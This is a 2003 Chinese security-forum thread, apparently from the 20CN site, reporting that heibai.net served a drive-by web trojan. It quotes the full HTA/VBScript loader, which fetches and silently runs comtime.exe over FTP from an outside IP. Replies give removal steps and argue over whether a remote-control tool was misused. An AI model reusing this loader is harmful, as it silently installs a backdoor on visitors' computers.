|
 | 作者: tabris17 [tabris17]
 论坛用户 |
登录 |
| 主题 [转贴]黑白网页暗藏反弹网页木马!!!太阴了!!!! « 上一主题 | 下一主题 » Zero000 发表于:2003-09-27 23:49 发帖: 48 注册: 2003-04-25 我是动鲨! 我说的黑白就是www.heibai.net,今天让我尤其的气愤! 今天我登陆黑白的时候发现在我的任务栏出现了一个最小化的程序,立刻又没有了!因为我前一段时间一直在做网页木马,意识到可能是最新的网页木马,立刻到我的缓存中去查找HTA脚本!果不其然!的确有! tt[1].hta很显然,他门在网页上安装了最新的网页木马! 这是HTA脚本的源码! <html> <HTA:APPLICATION caption="no" border="none" showInTaskBar="yes" windowState="minimize"> <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <script language="VBScript"> Dim fs, t Set fs = CreateObject("Scripting.FileSystemObject") Set t = fs.CreateTextFile("ftp.txt",True) t.WriteLine("open 218.78.213.248") t.WriteLine("qwe") t.WriteLine("qwe") t.WriteLine("bin") t.WriteLine("lcd c:\") t.WriteLine("get comtime.exe") t.WriteLine("bye") t.Close wsh.Run "ftp -s:ftp.txt",0,true wsh.Run "c:\comtime.exe" fs.DeleteFile "ftp.txt",true window.close </script> </html> 大家可以很清楚的看到!他连接了218.78.213.248,并下载了comtime.exe这个后门,经过我的测试!这是一个反弹型木马!太狠毒了!太卑鄙了! 在他们的主页源吗中这句 <object data="http://218.78.213.248/hb/hb/tt.wmll"></object> 正是调用木马的语句!!!!! 我真不知道这些人到底想作什么!我们只要一访问他的网页就要中木马!!! 痛骂黑白!・!!!!! 以上所言句句属实,如有半句假话,我以后退出这里! Zero000 编辑于 2003-09-27 23:50 --- 静坐常思己过 闲读百遍人非 Zero000 发表于:2003-09-27 23:55 发帖: 48 注册: 2003-04-25 截图如下: http://www.niuzu.net/upload/forum/2003927110412.jpg http://www.niuzu.net/upload/forum/2003927110447.jpg --- ............ .............. ................... 发帖: 27 注册: 1999-09-05 "20CN远程控制1.01客户"? 杀进程, 删文件,C:\winnt\system32\comtime.exe 改注册表,HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\comtime --- vow[]={0xB5,0xD6,0xD6,0xC6,0xC8,0xD5,0xBB,0xF5,0x20,0xB4,0xD3,0xCE,0xD2,0xD7,0xF6,0xC6,0xF0}; 菜菜虫 发表于:2003-09-28 15:28 发帖: 127 注册: 2001-08-18 是20cn的?20cn的老大是个挺和善的人,估计有人利用了他们的这个软件. yuqi_ah 发表于:2003-09-28 15:57 ................... ........................ 发帖: 1358 注册: 2003-01-25 引用 (菜菜虫 @ 2003-09-28 15:28) 是20cn的?20cn的老大是个挺和善的人,估计有人利用了他们的这个软件. 绝对利用了~~~20CN老大为人不错~~ --- http://forums.techguy.org/ http://www.kaspersky.com/remoteviruschk.html 202.6.244.208 24.191.28.255 cathy 发表于:2003-09-29 10:48 .......... ............. .................. |
| 地主 发表时间: 09/30 21:02 |
 | 回复: tomb [ycl011]  论坛用户 |
登录 |
|
到底是不是真的啊 如果真的话 那我肯定中了 我每天 都要上 20cn ttian heibai 溜一圈的 怎么检测我中了没啊 并且删掉 |
| B1层 发表时间: 09/30 21:17 |
| 回复: Greentea [napolun]  版主 |
登录 |
|
老大佳名远扬啊 |
| B2层 发表时间: 09/30 22:57 |
 | 回复: NetDemon [netdemon]  ADMIN |
登录 |
|
我已经在意见投诉看到这个消息,为了证实他是不是用了20CN发布的远程控制软件,我自己去黑白看,但那时候已经没有木马的网页代码了。不过通过别的论坛的截图,黑白放了木马应该是真的,至于是黑白给别人黑了放的,还是自己放的,那就不得而知,估计自己放的成分大一点,通过黑白现在的性质可以判断,他们连邮箱地址都在销售哦,放个木马收集一些“东西“也就理所当然了,如果是被黑放的,他现在早就应该发什么公告出来了。这些只是我自己的个人猜测。至于他发的这个木马是不是,20CN的远程控制软件,我们也不得而知,因为无法考证,我觉得有可能是文件名一样而已。不过就算真的是"20CN远程控制1.01客户",也不光我们事啊!我们发布一个软件出去,我们并无法控制到底是谁去使用它,用于什么用途。就像你用刀捅死人,生产刀的厂家是不用付任何责任的阿 |
| B3层 发表时间: 09/30 23:13 |
 | 回复: disun [benww] 论坛用户 |
登录 |
|
话是这么说,可就怕有人蛮不讲理,纠缠不清~~ |
| B4层 发表时间: 09/30 23:15 |
 | 回复: BE [blackeyes]  猪头肉 |
登录 |
|
老大也说了 工厂制造出刀来 但是凶徒拿去砍人 这与工厂何关? 想不到别处有人赞美老大啊。。。。真奇怪~~~~~~哈。。。。。。 |
| B5层 发表时间: 09/30 23:23 |
 | 回复: hebin [hebin]  论坛用户 |
登录 |
|
如果别人问我1+1=? 我会说=2 ,如果别人问我为什么1+1=2 我沉没! |
| B6层 发表时间: 09/30 23:36 |
 | 回复: chenshi [chenshi] 论坛用户 |
登录 |
|
heibai我也是经常去的,但是我不知道我是不是中了木马,不过没关系,我是在网吧上网 |
| B7层 发表时间: 10/01 08:13 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 茶余饭后 标题: 不知老大有什么想法,可能在偷笑吧